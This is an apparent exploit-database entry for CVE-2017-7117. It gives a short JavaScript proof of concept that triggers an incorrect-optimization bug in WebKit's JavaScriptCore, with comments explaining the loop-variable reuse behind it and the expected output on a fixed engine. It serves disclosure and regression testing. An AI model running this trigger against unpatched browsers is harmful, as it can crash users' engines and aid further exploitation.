WebKit JSC - 'BytecodeGenerator::emitGetByVal' Incorrect Optimization (2)
Author: Google Security Research
type: dos
platform: multiple
port:
date_added: 2017-10-04
date_updated: 2017-10-04
verified: 1
codes: CVE-2017-7117
tags:
aliases:
screenshot_url:
application_url:
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1319
The following PoC bypasses the fix for issue 1263 (https://bugs.chromium.org/p/project-zero/issues/detail?id=1263).
PoC:
-->
/**
 * Minimal regression case for the JavaScriptCore issue named in this page's
 * title (BytecodeGenerator::emitGetByVal, CVE-2017-7117).
 *
 * The for-in loop binds `i` to the property name "xx". The nested for-of does
 * not declare a new variable: it reuses that same binding as its loop target
 * and overwrites it with 0. The subscript read `o[i]` therefore runs with a
 * key that is no longer the property name produced by the for-in.
 *
 * Expected output on a correct engine: `o` has no properties, so `o[0]` is
 * `undefined`, and that is the value printed. Any other outcome (a crash or a
 * different value) indicates that the build is still affected.
 *
 * NOTE(review): the page does not spell out the root cause. Presumably the
 * for-in fast path for `o[i]` stays enabled even though `i` was reassigned
 * by the for-of; confirm against the linked Project Zero issue.
 */
function f() {
// Empty object: any subscript read on it should yield undefined.
let o = {};
// Single iteration; `i` starts out as the string "xx".
for (let i in {xx: 0}) {
// Assignment through a for-of head: `i` becomes the number 0 here. This is
// the only statement that changes `i` between the for-in head and the read.
for (i of [0]) {
}
// `print` is not defined on this page; presumably the JS shell's global
// output function (TODO confirm for the shell under test).
print(o[i]);
}
}
// Run the case once at load.
f();